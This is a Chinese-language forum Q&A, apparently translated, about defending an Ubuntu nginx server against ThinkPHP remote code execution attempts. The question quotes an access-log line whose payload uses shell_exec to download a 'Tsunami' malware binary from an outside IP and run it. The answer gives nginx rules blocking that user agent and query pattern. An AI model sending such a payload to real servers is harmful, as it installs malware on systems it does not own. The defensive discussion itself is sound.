块远程代码执行Ubuntu Fail2Ban & Cloudflare

Question

最近我发现，我的Ubuntu (LEMP)服务器成为远程代码执行攻击的目标。就access.log文件而言，它可能如下所示：

183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"

我正在使用Failban，Cloudflare和CSF。我想知道，用fail2ban阻止这种攻击还有其他的可能性吗？如果我能阻止这样的攻击，我就会阻止那些来自CloudFlare WAF的IP。

Answer 1

嗯，我相信，fail2ban不是解决你所描述的洪水的正确方法。不过，它有一种方法来实现它(参见这里一文)。

我想说的是，像这样的攻击应该有一个非常大的I池。而阻止IP，而不是阻止行为模式不是一个完整的解决方案。

对于您的具体情况，您可以继续使用阻止UserAgent和位置模式的方法。

例如：

location / {
    if ($http_user_agent ~ (tsunami) ) {
        return 403;
    }
    if ($query_string ~ "call_user_func_array" ) {
        return 403;
    }
    ...
}

我还建议您确保服务器上没有任何蠕虫和后门(例如，netstat -lntp将显示使用它们的任何打开的端口和服务)。